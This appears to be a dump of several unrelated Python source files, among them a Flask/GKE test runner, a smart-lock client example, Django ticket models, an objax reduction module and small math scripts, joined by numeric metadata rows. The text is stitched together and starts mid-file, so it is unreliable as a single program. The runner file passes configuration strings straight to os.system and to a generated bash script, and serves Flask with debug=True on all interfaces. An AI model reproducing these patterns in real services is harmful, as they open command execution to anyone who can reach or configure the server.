{directory}/test_runner.py -c "{config}" -t {timestamp} ' '-d {tempdir} -s {server}') class KeytarError(Exception): pass def run_test_config(config): """Runs a single test iteration from a configuration.""" tempdir = tempfile.mkdtemp() logging.info('Fetching github repository') # Get the github repo and clone it. github_config = config['github'] github_clone_args, github_repo_dir = _get_download_github_repo_args( tempdir, github_config) os.makedirs(github_repo_dir) subprocess.call(github_clone_args) current_dir = os.getcwd() timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M') results[timestamp] = { 'timestamp': timestamp, 'status': 'Start', 'tests': {}, 'docker_image': config['docker_image'] } # Generate a test script with the steps described in the configuration, # as well as the command to execute the test_runner. with tempfile.NamedTemporaryFile(dir=tempdir, delete=False) as f: tempscript = f.name f.write('#!/bin/bash\n') if 'before_test' in config: # Change to the github repo directory, any steps to be run before the # tests should be executed from there. os.chdir(github_repo_dir) for before_step in config['before_test']: f.write('%s\n' % before_step) server = 'http://localhost:%d' % app.config['port'] f.write(_TEMPLATE.format( directory=current_dir, config=yaml.dump(config), timestamp=timestamp, tempdir=tempdir, server=server)) os.chmod(tempscript, 0775) try: subprocess.call([tempscript]) except subprocess.CalledProcessError as e: logging.warn('Error running test_runner: %s', str(e)) finally: os.chdir(current_dir) shutil.rmtree(tempdir) @app.route('/') def index(): return app.send_static_file('index.html') @app.route('/test_results') def test_results(): return json.dumps([results[x] for x in sorted(results)]) @app.route('/test_log') def test_log(): # Fetch the output from a test. log = '%s.log' % os.path.basename(flask.request.values['log_name']) return (flask.send_from_directory('/tmp/testlogs', log), 200, {'Content-Type': 'text/css'}) @app.route('/update_results', methods=['POST']) def update_results(): # Update the results dict, called from the test_runner. update_args = flask.request.get_json() timestamp = update_args['timestamp'] results[timestamp].update(update_args) return 'OK' def _validate_request(keytar_password, request_values): """Checks a request against the password provided to the service at startup. Raises an exception on errors, otherwise returns None. Args: keytar_password: password provided to the service at startup. request_values: dict of POST request values provided to Flask. Raises: KeytarError: raised if the password is invalid. """ if keytar_password: if 'password' not in request_values: raise KeytarError('Expected password not provided in test_request!') elif request_values['password'] != keytar_password: raise KeytarError('Incorrect password passed to test_request!') @app.route('/test_request', methods=['POST']) def test_request(): """Respond to a post request to execute tests. This expects a json payload containing the docker webhook information. If this app is configured to use a password, the password should be passed in as part of the POST request. Returns: HTML response. """ try: _validate_request(app.config['password'], flask.request.values) except KeytarError as e: flask.abort(400, str(e)) webhook_data = flask.request.get_json() repo_name = webhook_data['repository']['repo_name'] test_configs = [c for c in app.config['keytar_config']['config'] if c['docker_image'] == repo_name] if not test_configs: return 'No config found for repo_name: %s' % repo_name for test_config in test_configs: test_worker.add_test(test_config) return 'OK' def handle_cluster_setup(cluster_setup): """Setups up a cluster. Currently only GKE is supported. This step handles setting up credentials and ensuring a valid project name is used. Args: cluster_setup: YAML cluster configuration. Raises: KeytarError: raised on invalid setup configurations. """ if cluster_setup['type'] != 'gke': return if 'keyfile' not in cluster_setup: raise KeytarError('No keyfile found in GKE cluster setup!') # Add authentication steps to allow keytar to start clusters on GKE. gcloud_args = ['gcloud', 'auth', 'activate-service-account', '--key-file', cluster_setup['keyfile']] logging.info('authenticating using keyfile: %s', cluster_setup['keyfile']) subprocess.call(gcloud_args) os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = cluster_setup['keyfile'] # Ensure that a project name is correctly set. Use the name if provided # in the configuration, otherwise use the current project name, or else # the first available project name. if 'project_name' in cluster_setup: logging.info('Setting gcloud project to %s', cluster_setup['project_name']) subprocess.call( ['gcloud', 'config', 'set', 'project', cluster_setup['project_name']]) else: config = subprocess.check_output( ['gcloud', 'config', 'list', '--format', 'json']) project_name = json.loads(config)['core']['project'] if not project_name: projects = subprocess.check_output(['gcloud', 'projects', 'list']) first_project = projects[0]['projectId'] logging.info('gcloud project is unset, setting it to %s', first_project) subprocess.check_output( ['gcloud', 'config', 'set', 'project', first_project]) def handle_install_steps(keytar_config): """Runs all config installation/setup steps. Args: keytar_config: YAML keytar configuration. """ if 'install' not in keytar_config: return install_config = keytar_config['install'] for cluster_setup in install_config.get('cluster_setup', []): handle_cluster_setup(cluster_setup) # Install any dependencies using apt-get. if 'dependencies' in install_config: subprocess.call(['apt-get', 'update']) os.environ['DEBIAN_FRONTEND'] = 'noninteractive' for dep in install_config['dependencies']: subprocess.call( ['apt-get', 'install', '-y', '--no-install-recommends', dep]) # Run any additional commands if provided. for step in install_config.get('extra', []): os.system(step) # Update path environment variable. for path in install_config.get('path', []): os.environ['PATH'] = '%s:%s' % (path, os.environ['PATH']) def _get_download_github_repo_args(tempdir, github_config): """Get arguments for github actions. Args: tempdir: Base directory to git clone into. github_config: Configuration describing the repo, branches, etc. Returns: ([string], string) for arguments to pass to git, and the directory to clone into. """ repo_prefix = github_config.get('repo_prefix', 'github') repo_dir = os.path.join(tempdir, repo_prefix) git_args = ['git', 'clone', 'https://github.com/%s' % github_config['repo'], repo_dir] if 'branch' in github_config: git_args += ['-b', github_config['branch']] return git_args, repo_dir class TestWorker(object): """A simple test queue. HTTP requests append to this work queue.""" def __init__(self): self.test_queue = Queue.Queue() self.worker_thread = threading.Thread(target=self.worker_loop) self.worker_thread.daemon = True def worker_loop(self): # Run forever, executing tests as they are added to the queue. while True: item = self.test_queue.get() run_test_config(item) self.test_queue.task_done() def start(self): self.worker_thread.start() def add_test(self, config): self.test_queue.put(config) test_worker = TestWorker() def main(): logging.getLogger().setLevel(logging.INFO) parser = argparse.ArgumentParser(description='Run keytar') parser.add_argument('--config_file', help='Keytar config file', required=True) parser.add_argument('--password', help='Password', default=None) parser.add_argument('--port', help='Port', default=8080, type=int) keytar_args = parser.parse_args() with open(keytar_args.config_file, 'r') as yaml_file: yaml_config = yaml_file.read() if not yaml_config: raise ValueError('No valid yaml config!') keytar_config = yaml.load(yaml_config) handle_install_steps(keytar_config) if not os.path.isdir('/tmp/testlogs'): os.mkdir('/tmp/testlogs') test_worker.start() app.config['port'] = keytar_args.port app.config['password'] = keytar_args.password app.config['keytar_config'] = keytar_config app.run(host='0.0.0.0', port=keytar_args.port, debug=True) if __name__ == '__main__': main()
31.625397
80
0.709797
1,356
9,962
5.066372
0.275811
0.027948
0.0131
0.01179
0.050655
0.023581
0.023581
0.012809
0
0
0
0.003279
0.173459
9,962
314
81
31.726115
0.831066
0.133808
0
0.044944
0
0
0.195724
0.01478
0
0
0
0
0
0
null
null
0.05618
0.073034
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
e5b90a3554ab06af73ddd302f4a2c603dc55c402
894
py
Python
pytedee/pytedee/example.py
konradsikorski/pytedee
02b7a39b46af3887e933c3d4454d0986a5277bbb
[ "MIT" ]
4
2021-01-05T23:39:07.000Z
2021-11-18T12:51:50.000Z
pytedee/pytedee/example.py
konradsikorski/pytedee
02b7a39b46af3887e933c3d4454d0986a5277bbb
[ "MIT" ]
3
2020-11-28T14:02:32.000Z
2022-02-02T22:08:37.000Z
pytedee/pytedee/example.py
konradsikorski/pytedee
02b7a39b46af3887e933c3d4454d0986a5277bbb
[ "MIT" ]
7
2020-11-25T21:22:14.000Z
2022-03-31T19:52:14.000Z
''' Created on 01.11.2020 @author: joerg ''' import time from pytedee.TedeeClient import TedeeClient from pytedee.Lock import Lock from pytedee.TedeeClientException import TedeeClientException '''Tedee Credentials''' username = "username" password = "password" client = TedeeClient(username, password) print ("Token: " + str(client._token)) print ("Token valid: " + str(client._token_valid_until)) locks = client.get_locks() for lock in locks: print("----------------------------------------------") print("Lock name: " + lock.get_name()) print("Lock id: " + str(lock.get_id())) print("Lock Battery: " + str(lock.get_battery_level())) client.get_state() print("Is Locked: " + str(client.is_locked(lock.get_id()))) print("Is Unlocked: " + str(client.is_unlocked(lock.get_id()))) # client.unlock(lock.get_id()) # time.sleep(3) # client.open(lock.get_id())
29.8
67
0.657718
113
894
5.061947
0.353982
0.085664
0.078671
0.048951
0
0
0
0
0
0
0
0.011688
0.138702
894
29
68
30.827586
0.731169
0.130872
0
0
0
0
0.188172
0.061828
0
0
0
0
0
1
0
false
0.111111
0.222222
0
0.222222
0.444444
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
1
0
2
e5c7c4046de95a16522016b26af1724d48486862
3,498
py
Python
backend_app/users/models.py
shakil2995/IUB-Help-Desk-System
2bf6deb1dbd4f84c784894f69db4dfa971fb65dd
[ "Apache-2.0" ]
1
2021-11-17T14:03:42.000Z
2021-11-17T14:03:42.000Z
backend_app/users/models.py
shakil2995/IUB-Help-Desk-System
2bf6deb1dbd4f84c784894f69db4dfa971fb65dd
[ "Apache-2.0" ]
null
null
null
backend_app/users/models.py
shakil2995/IUB-Help-Desk-System
2bf6deb1dbd4f84c784894f69db4dfa971fb65dd
[ "Apache-2.0" ]
null
null
null
import uuid from django.db import models from django.contrib.auth.base_user import BaseUserManager from django.contrib.auth.models import AbstractBaseUser from django.utils import timezone from .modelchioce import PRIORITY_CHOICE, RESOLVE_CHOICE, USER_TYPE_CHOICE today = timezone.now class CustomUserManager(BaseUserManager): def create_user(self, email, password=None): if not email: raise ValueError('Users must have an email address') user = self.model( email=self.normalize_email(email), ) user.set_password(password) user.save(using=self._db) return user def create_superuser(self, email, password): user = self.create_user( email, password=password, ) user.is_staff = True user.is_admin = True user.is_superuser = True user.save(using=self._db) return user class CustomUser(AbstractBaseUser): name = models.CharField(max_length=255, blank=True) email = models.EmailField(unique=True, max_length=255) mobile = models.CharField(max_length=255, blank=True) password = models.CharField(max_length=255) is_active = models.BooleanField(default=True) is_staff = models.BooleanField(default=False) is_admin = models.BooleanField(default=False) is_superuser = models.BooleanField(default=False) created_date = models.DateTimeField(auto_now_add=True) updated_date = models.DateTimeField(auto_now=True) user_type = models.CharField(choices=USER_TYPE_CHOICE,max_length=255,default='admin') USERNAME_FIELD = 'email' REQUIRED_FIELDS = [] objects = CustomUserManager() def has_perm(self, perm, obj=None): return self.is_superuser def has_module_perms(self, app_label): return self.is_superuser def __str__(self): return str(self.email) class TokenAuth(models.Model): account = models.ForeignKey(CustomUser, on_delete=models.CASCADE) is_validated = models.BooleanField(default=False) logged_in = models.BooleanField(default=False) refresh_token = models.TextField() created_date = models.DateTimeField(auto_now_add=True) updated_date = models.DateTimeField(auto_now=True) def __str__(self): return self.account # class Permission(models.Model): # user = models.ForeignKey(CustomUser,on_delete=models.PROTECT) # permission_name = models.TextField() # price = models.DecimalField(max_digits=6, decimal_places=2) # created_date = models.DateTimeField(auto_now_add=True) # updated_date = models.DateTimeField(auto_now=True) class Ticket(models.Model): title = models.CharField(max_length=255,default="") description = models.TextField(default="") initiator = models.ForeignKey(CustomUser, on_delete=models.CASCADE,related_name='who_raise_ticket') assigne = models.ForeignKey(CustomUser, on_delete=models.CASCADE,null=True,blank=True,related_name='assigne_for_ticket') priority = models.CharField(choices=PRIORITY_CHOICE,max_length=50,default='medium') request_type = models.CharField(max_length=50,default='',null=True) resolve_status = models.CharField(choices=RESOLVE_CHOICE,max_length=50,default='open',null=True) created_date = models.DateTimeField(auto_now_add=True) updated_date = models.DateTimeField(auto_now=True) updated_by = models.ForeignKey(CustomUser, on_delete=models.CASCADE,null=True,blank=True,related_name='updated_by')
37.212766
124
0.731561
434
3,498
5.686636
0.274194
0.03282
0.074554
0.08752
0.39222
0.305511
0.289303
0.198541
0.198541
0.198541
0
0.008947
0.16924
3,498
93
125
37.612903
0.84033
0.090337
0
0.205882
0
0
0.030246
0
0
0
0
0
0
1
0.088235
false
0.073529
0.088235
0.058824
0.764706
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e5ce5bfbe9bc862706ab6922b4a70515ff0c41e6
3,480
py
Python
common/NormalTable.py
hanhui666888/AIStudy
57d8cd4c0bb6accdc409f5518ade51f4d8c66596
[ "Apache-2.0" ]
null
null
null
common/NormalTable.py
hanhui666888/AIStudy
57d8cd4c0bb6accdc409f5518ade51f4d8c66596
[ "Apache-2.0" ]
null
null
null
common/NormalTable.py
hanhui666888/AIStudy
57d8cd4c0bb6accdc409f5518ade51f4d8c66596
[ "Apache-2.0" ]
null
null
null
import numpy as np import math import random as rd normalTable = [0.5000,0.5040,0.5080,0.5120,0.5160,0.5199,0.5239,0.5279,0.5319,0.5359, 0.5398,0.5438,0.5478,0.5517,0.5557,0.5596,0.5636,0.5675,0.5714,0.5753, 0.5793,0.5832,0.5871,0.5910,0.5948,0.5987,0.6026,0.6064,0.6103,0.6141, 0.6179,0.6217,0.6255,0.6293,0.6331,0.6368,0.6406,0.6443,0.6480,0.6517, 0.6554,0.6591,0.6628,0.6664,0.6700,0.6736,0.6772,0.6808,0.6844,0.6879, 0.6915,0.6950,0.6985,0.7019,0.7054,0.7088,0.7123,0.7157,0.7190,0.7224, 0.7257,0.7291,0.7324,0.7357,0.7389,0.7422,0.7454,0.7486,0.7517,0.7549, 0.7580,0.7611,0.7642,0.7673,0.7704,0.7734,0.7764,0.7794,0.7823,0.7852, 0.7881,0.7910,0.7939,0.7967,0.7995,0.8023,0.8051,0.8078,0.8106,0.8133, 0.8159,0.8186,0.8212,0.8238,0.8264,0.8289,0.8315,0.8340,0.8365,0.8389, 0.8413,0.8438,0.8461,0.8485,0.8508,0.8531,0.8554,0.8577,0.8599,0.8621, 0.8643,0.8665,0.8686,0.8708,0.8729,0.8749,0.8770,0.8790,0.8810,0.8830, 0.8849,0.8869,0.8888,0.8907,0.8925,0.8944,0.8962,0.8980,0.8997,0.9015, 0.9032,0.9049,0.9066,0.9082,0.9099,0.9115,0.9131,0.9147,0.9162,0.9177, 0.9192,0.9207,0.9222,0.9236,0.9251,0.9265,0.9279,0.9292,0.9306,0.9319, 0.9332,0.9345,0.9357,0.9370,0.9382,0.9394,0.9406,0.9418,0.9429,0.9441, 0.9452,0.9463,0.9474,0.9484,0.9495,0.9505,0.9515,0.9525,0.9535,0.9545, 0.9554,0.9564,0.9573,0.9582,0.9591,0.9599,0.9608,0.9616,0.9625,0.9633, 0.9641,0.9649,0.9656,0.9664,0.9671,0.9678,0.9686,0.9693,0.9699,0.9706, 0.9713,0.9719,0.9726,0.9732,0.9738,0.9744,0.9750,0.9756,0.9761,0.9767, 0.9772,0.9778,0.9783,0.9788,0.9793,0.9798,0.9803,0.9808,0.9812,0.9817, 0.9821,0.9826,0.9830,0.9834,0.9838,0.9842,0.9846,0.9850,0.9854,0.9857, 0.9861,0.9864,0.9868,0.9871,0.9875,0.9878,0.9881,0.9884,0.9887,0.9890, 0.9893,0.9896,0.9898,0.9901,0.9904,0.9906,0.9909,0.9911,0.9913,0.9916, 0.9918,0.9920,0.9922,0.9925,0.9927,0.9929,0.9931,0.9932,0.9934,0.9936, 0.9938,0.9940,0.9941,0.9943,0.9945,0.9946,0.9948,0.9949,0.9951,0.9952, 0.9953,0.9955,0.9956,0.9957,0.9959,0.9960,0.9961,0.9962,0.9963,0.9964, 0.9965,0.9966,0.9967,0.9968,0.9969,0.9970,0.9971,0.9972,0.9973,0.9974, 0.9974,0.9975,0.9976,0.9977,0.9977,0.9978,0.9979,0.9979,0.9980,0.9981, 0.9981,0.9982,0.9982,0.9983,0.9984,0.9984,0.9985,0.9985,0.9986,0.9986, 0.9987,0.9987,0.9987,0.9988,0.9988,0.9989,0.9989,0.9989,0.9990,0.9990, 0.9990,0.9991,0.9991,0.9991,0.9992,0.9992,0.9992,0.9992,0.9993,0.9993, 0.9993,0.9993,0.9994,0.9994,0.9994,0.9994,0.9994,0.9995,0.9995,0.9995, 0.9995,0.9995,0.9995,0.9996,0.9996,0.9996,0.9996,0.9996,0.9996,0.9996, 0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9998] def getValueByProbability(probability): for i in range(len(normalTable)): if normalTable[i] >= probability: return i/100 else: return -1 def sigmod(x): return 1 / (math.exp(-x) + 1) def f(x): return math.exp(x**2 /(-2))/math.sqrt(2 * math.pi) def tanh(x): a = math.exp(x) b = math.exp( -x) return (a-b)/(a+b) def tanhd(x): return (1-tanh(x)**2)*f(x)*x
56.129032
85
0.583621
780
3,480
2.603846
0.432051
0.022157
0.026588
0.039389
0.116691
0.086657
0.086657
0.066962
0.066962
0.054653
0
0.626467
0.192241
3,480
61
86
57.04918
0.096051
0
0
0
0
0
0
0
0
0
0
0
0
1
0.092593
false
0
0.055556
0.055556
0.259259
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e5ceb9c9097d4a471d8420c4497b1a4b646396ed
1,493
py
Python
objax/functional/parallel.py
kihyuks/objax
101907799e64c0d8160febf84a341d4d386bff51
[ "Apache-2.0" ]
715
2020-08-20T07:23:03.000Z
2022-03-31T18:17:54.000Z
objax/functional/parallel.py
kihyuks/objax
101907799e64c0d8160febf84a341d4d386bff51
[ "Apache-2.0" ]
145
2020-08-21T07:42:36.000Z
2022-03-18T16:51:37.000Z
objax/functional/parallel.py
kihyuks/objax
101907799e64c0d8160febf84a341d4d386bff51
[ "Apache-2.0" ]
59
2020-08-20T07:30:53.000Z
2022-01-05T23:00:06.000Z
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __all__ = ['partial', 'pmax', 'pmean', 'pmin', 'psum'] from functools import partial import jax from jax import lax def pmax(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce max on x over the device axis axis_name.""" return lax.pmax(x, axis_name) def pmean(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce mean on x over the device axis axis_name.""" return lax.pmean(x, axis_name) def pmin(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce min on x over the device axis axis_name.""" return lax.pmin(x, axis_name) def psum(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce sum on x over the device axis axis_name.""" return lax.psum(x, axis_name)
36.414634
82
0.734092
230
1,493
4.695652
0.4
0.088889
0.059259
0.074074
0.433333
0.433333
0.433333
0.433333
0.433333
0.433333
0
0.006421
0.165439
1,493
40
83
37.325
0.860353
0.558607
0
0
0
0
0.076677
0
0
0
0
0
0
1
0.333333
false
0
0.25
0
0.916667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e5d69e1b59d1ee8b1c553f23fc3db8e2a79cac4c
427
py
Python
rbfmorph/__init__.py
utkarshmech/rbfmorph
7f5a96ea990dd3da59d4daa0546d365340c5c7fd
[ "MIT" ]
2
2021-07-08T09:25:29.000Z
2022-03-25T02:57:17.000Z
rbfmorph/__init__.py
utkarshmech/rbfmorph
7f5a96ea990dd3da59d4daa0546d365340c5c7fd
[ "MIT" ]
null
null
null
rbfmorph/__init__.py
utkarshmech/rbfmorph
7f5a96ea990dd3da59d4daa0546d365340c5c7fd
[ "MIT" ]
1
2021-08-31T13:02:28.000Z
2021-08-31T13:02:28.000Z
""" rbfmorph init file """ from .fem_disp import * from .input import * from .coordinates import * from .import_msh import * from .rbf_func import * from .solve import * from .vtk_export import * from .new_coor import * __project__ = 'rbfmorph' __title__ = "rbfmorph" __author__ = "Utkarsh Thakre" __license__ = "MIT" __version__ = "0.0.1" __mail__ = '17d100018@iitb.ac.in' __maintainer__ = __author__ __status__ = "breaking"
20.333333
33
0.737705
54
427
5.074074
0.648148
0.255474
0
0
0
0
0
0
0
0
0
0.03022
0.147541
427
20
34
21.35
0.722527
0.042155
0
0
0
0
0.164589
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
e5dbf5c62b02a11a9f5a3a4f6ad79c8e6ea354e7
1,615
py
Python
sciope/utilities/summarystats/summary_base.py
rmjiang7/sciope
5122107dedcee9c39458e83d853ec35f91268780
[ "Apache-2.0" ]
5
2019-05-21T18:56:04.000Z
2020-08-02T20:09:43.000Z
sciope/utilities/summarystats/summary_base.py
rmjiang7/sciope
5122107dedcee9c39458e83d853ec35f91268780
[ "Apache-2.0" ]
6
2020-10-16T08:11:10.000Z
2022-03-16T09:35:46.000Z
sciope/utilities/summarystats/summary_base.py
rmjiang7/sciope
5122107dedcee9c39458e83d853ec35f91268780
[ "Apache-2.0" ]
6
2019-05-23T09:09:00.000Z
2020-08-02T20:09:45.000Z
# Copyright 2017 Prashant Singh, Fredrik Wrede and Andreas Hellander # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Base Class for Summary Statistics """ # Imports from abc import ABCMeta, abstractmethod # Class definition class SummaryBase(object): """ Base class for summary statistics. """ __metaclass__ = ABCMeta def __init__(self, name, mean_trajectories=False, use_logger=False): """ Set up local variables :param name: unique identifier for the statistic :param mean_trajectories: if enabled, it returns the mean statistic value computed over all trajectories :param use_logger: if enabled, logs the summary statistic calculation in a file and on screen """ self.name = name self.summaries_names = None self.mean_trajectories = mean_trajectories self.use_logger = use_logger def compute(self, data): """ Calculate the summary statistic value for given 'data' :param data: a fixed data set or simulation result :return: the computed summary statistic value """
34.361702
112
0.709598
214
1,615
5.275701
0.556075
0.053144
0.023029
0.028344
0.051373
0
0
0
0
0
0
0.0064
0.226006
1,615
46
113
35.108696
0.8968
0.682353
0
0
0
0
0
0
0
0
0
0
0
1
0.222222
false
0
0.111111
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e5e0d12a9e36fc5f92b96a631ff6de1286ac2249
1,566
py
Python
application/mod_collage/col_controllers.py
hieusydo/Voyage
2a98118131fad927326d318ae1766e64bbb5add8
[ "MIT" ]
1
2018-04-23T05:16:49.000Z
2018-04-23T05:16:49.000Z
application/mod_collage/col_controllers.py
hieusydo/Voyage
2a98118131fad927326d318ae1766e64bbb5add8
[ "MIT" ]
null
null
null
application/mod_collage/col_controllers.py
hieusydo/Voyage
2a98118131fad927326d318ae1766e64bbb5add8
[ "MIT" ]
null
null
null
from flask import Blueprint, render_template, session, redirect, url_for from flask_wtf import FlaskForm from wtforms import SelectField from application.mod_collage.photoManip import generateCollage from application.mod_auth.models import Landmark mod_collage = Blueprint('collage', __name__, url_prefix='/collage') # Represents the collage form class AddColForm(FlaskForm): landmark1 = SelectField("Landmark 1") landmark2 = SelectField("Landmark 2") # Allows setting the 'choices' field after creation def setChoices(self, landmarks): self.landmark1.choices = landmarks self.landmark2.choices = landmarks @mod_collage.route('/get/', methods=['GET', 'POST']) def picTest(): if 'user_id' not in session: return redirect(url_for('auth.signin')) # Get landmarks by id uid = session['user_id'] landmarks = Landmark.query.filter_by(usrID=uid).all() landmarks.sort(key=lambda x: x.lmName) print "picTest", landmarks # Create a list of value,display tuples from the landmarks choices = [] for i in landmarks: choices.append((i.photoFileURL, i.lmName)) # Create and set the form choices form = AddColForm() form.setChoices(choices) if form.validate_on_submit(): print "picTest about to generateCollage..." url = generateCollage(form.landmark1.data, form.landmark2.data) print "picTest done generateCollage" return render_template('collage/result.html', image_url=url) return render_template('collage/request.html', form=form)
32.625
72
0.716475
193
1,566
5.704663
0.466321
0.038147
0.025431
0.049046
0
0
0
0
0
0
0
0.00626
0.183908
1,566
48
73
32.625
0.855243
0.118774
0
0
1
0
0.131636
0
0
0
0
0
0
0
null
null
0
0.16129
null
null
0.16129
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
e5ebc328612496ae631b2fd37b4868aa23e5ec05
2,229
py
Python
test/test.py
kiziebar/pycom
947eb5ebda18cd40cc2478171411846b6bb3360b
[ "MIT" ]
null
null
null
test/test.py
kiziebar/pycom
947eb5ebda18cd40cc2478171411846b6bb3360b
[ "MIT" ]
null
null
null
test/test.py
kiziebar/pycom
947eb5ebda18cd40cc2478171411846b6bb3360b
[ "MIT" ]
null
null
null
import unittest import numpy as np from pycom import Comet class TestComet(unittest.TestCase): def test_criteriaFail(self): with self.assertRaises(TypeError): Comet(["Bad", 0.5, 1]) def test_criteriaType(self): with self.assertRaises(TypeError): Comet((0, 0.5, 1)) def test_lackOfCriteria(self): with self.assertRaises(ValueError): Comet([]) def test_noCoInRateCo(self): with self.assertRaises(ValueError): tmp = Comet([[2, 3]]) tmp.rate_co() def test_preferenceMejFail(self): with self.assertRaises(ValueError): tmp = Comet([[0, 1]]) tmp.generate_co() tmp.rate_co('mej') def test_preferenceValueFail(self): with self.assertRaises(ValueError): tmp = Comet([[0, 1]]) tmp.generate_co() tmp.rate_co(value=8) def test_preferenceOptionFail(self): with self.assertRaises(ValueError): tmp = Comet([[0, 1]]) tmp.generate_co() tmp.rate_co('bad') def test_noCoInRate(self): with self.assertRaises(ValueError): tmp = Comet([[2, 3]]) tmp.rate(np.asarray([[0.2, 0.3]])) def test_noCoInChangePreferenceCo(self): with self.assertRaises(ValueError): tmp = Comet([[2, 3]]) tmp.change_co_preference([0.1, 0.2]) def test_highPreferenceValue(self): with self.assertRaises(ValueError): tmp = Comet([[2, 3]]) tmp.generate_co() tmp.change_co_preference([0.1, 2]) def test_lowPreferenceValue(self): with self.assertRaises(ValueError): tmp = Comet([[2, 3]]) tmp.generate_co() tmp.change_co_preference([0.1, -1]) def test_alternativesLen(self): with self.assertRaises(ValueError): tmp = Comet([[2, 3], [2, 3, 4]]) tmp.generate_co() tmp.rate(np.array([[1, 2, 3]])) def test_alternativesValue(self): with self.assertRaises(ValueError): tmp = Comet([[1, 2], [2, 5, 8]]) tmp.generate_co() tmp.rate(np.array([[4, 20], [2, -1]]))
29.328947
50
0.559892
257
2,229
4.7393
0.194553
0.074713
0.128079
0.256158
0.654351
0.610016
0.531199
0.452381
0.452381
0.416256
0
0.036013
0.302378
2,229
76
50
29.328947
0.747267
0
0
0.466667
0
0
0.004036
0
0
0
0
0
0.216667
1
0.216667
false
0
0.05
0
0.283333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
f90b203ec4c7e85f01d14f890abe264c1e434796
1,716
py
Python
Code/coupon_collector.py
PacktPublishing/Modern-Python-Cookbook
40ff656c64421ddf6c288e058bb99a929f6d4c39
[ "MIT" ]
107
2016-11-30T02:13:39.000Z
2022-03-31T06:38:59.000Z
Code/coupon_collector.py
fengfanzhiwu/Modern-Python-Cookbook
8eff962f6eae514d531beca9051aefa34941ef4d
[ "MIT" ]
2
2017-04-19T04:08:21.000Z
2019-03-09T16:18:33.000Z
Code/coupon_collector.py
fengfanzhiwu/Modern-Python-Cookbook
8eff962f6eae514d531beca9051aefa34941ef4d
[ "MIT" ]
71
2017-01-16T06:35:17.000Z
2022-03-01T21:25:54.000Z
"""Python Cookbook See http://www.brynmawr.edu/math/people/anmyers/PAPERS/SIGEST_Coupons.pdf and https://en.wikipedia.org/wiki/Stirling_numbers_of_the_second_kind and https://en.wikipedia.org/wiki/Binomial_coefficient """ from math import factorial def expected(n, population=8): """ What is the probability p(n, d) that exactly n boxes of cereal will have to be purchased in order to obtain, for the first time, a complete collection of at least one of each of the d kinds of souvenir coupons? .. math:: p(n, d) = \frac{d!}{d^n} \lbrace\textstyle{ n-1 \atop d-1 }\rbrace """ return factorial(population)/population**n * stirling2(n-1, population-1) def binom(n, k): """ .. math:: \binom n k = \frac{n!}{k!\,(n-k)!} \quad \text{for }\ 0\leq k\leq n """ return factorial(n)/(factorial(k)*factorial(n-k)) def stirling2(n, k): """ The Stirling numbers of the second kind, written S(n,k) or :math:`\lbrace\textstyle{n\atop k}\rbrace` count the number of ways to partition a set of n labelled objects into k nonempty unlabelled subsets. .. math:: \lbrace\textstyle{n\atop n}\rbrace = 1 \\ \lbrace\textstyle{n\atop 1}\rbrace = 1 \\ \lbrace\textstyle{n\atop k}\rbrace = k \lbrace\textstyle{n-1 \atop k}\rbrace + \lbrace\textstyle{n-1 \atop k-1}\rbrace Or .. math:: \left\{ {n \atop k}\right\} = \frac{1}{k!}\sum_{j=0}^{k} (-1)^{k-j} \binom{k}{j} j^n """ return 1/factorial(k)*sum( (-1 if (k-j)%2 else 1)*binom(k,j)*j**n for j in range(0,k+1) ) if __name__ == "__main__": for i in range(8,30): print(i, expected(i, 8)) print(binom(24,12))
23.833333
126
0.617133
282
1,716
3.698582
0.382979
0.100671
0.107383
0.076702
0.298178
0.233941
0
0
0
0
0
0.0231
0.217949
1,716
71
127
24.169014
0.754098
0.652098
0
0
0
0
0.017505
0
0
0
0
0
0
